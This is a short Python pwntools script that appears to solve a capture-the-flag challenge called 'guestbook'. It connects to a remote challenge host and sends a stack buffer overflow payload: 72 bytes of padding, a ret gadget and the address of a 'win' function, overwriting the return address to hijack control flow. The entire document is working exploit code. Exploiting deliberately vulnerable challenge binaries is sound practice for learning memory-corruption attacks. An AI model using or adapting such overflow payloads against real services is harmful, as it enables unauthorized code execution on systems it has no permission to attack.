#!/usr/bin/env python3
from pwn import *

# context.binary = elf = ELF('guestbook',checksec=False)
OFFSET_TO_RIP = 72
ret = 0x40101A  # ROPGadget ret
win = 0x40121B  # win address (nm)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13599)
p.recvuntil(b"name?\n")

payload = flat(
    b"A" * OFFSET_TO_RIP,
    p64(ret),
    p64(win),
)
p.send(payload)
p.interactive()